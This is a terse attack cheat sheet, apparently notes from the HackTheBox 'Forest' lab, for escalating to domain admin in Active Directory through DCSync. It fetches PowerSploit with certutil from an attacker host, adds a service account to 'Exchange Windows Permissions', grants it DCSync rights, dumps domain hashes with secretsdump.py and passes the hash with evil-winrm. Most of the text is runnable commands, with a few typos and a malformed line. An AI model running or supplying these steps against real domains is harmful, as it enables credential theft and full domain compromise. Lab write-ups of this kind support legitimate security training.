DCSync

DCSync rights allows dumping of hashes - Based on HTB Forest

#Requires PowerUp - Target - assumed that a evil-winrm shell is available

$ENV:PSModulePath

mkdir C:\Users\%username%\Documents\WindowsPowershell\Modules

cd C:\Users\%username%\Documents\WindowsPowershell\Modules

#Copy Powersploit to modules directory

certutil -urlcache -split -f http://10.0.0.1/powersploit-master.zip

#unpack zip

Expand-archive Powersploit-master.zip

cd into folder

import-module .\Powerspolit.psd1

get-module - confirm that Powerspolit is listed

#Add Group membership and DCSync Rights

Add-DomainGroupMembership -Identity 'Exchange Windows Permissions' -Membership svc-alfresco; $pw = ConvertTo-SecureString 'password' -asPlainText -force; $acc = New-Object System.Management.Automation.PSCredential('htb\svc-alfresco', $pw)' Add-DomainObjectACL -Credential $acc -PrincipalIdentity 'svc-alfresco' -Target-Identity 'htb.loc\Domain Admins' -Rights DCSync

#Secretsdump.py - Attacker

#Dump password hashes from DC

cd to Impacket\Examples

secretsdump.py svc-alfresco:password@10.0.0.1

#Pass the hash with evil-winrm

evil-winrm -u administrator -p passwordhash -i 10.0.0.1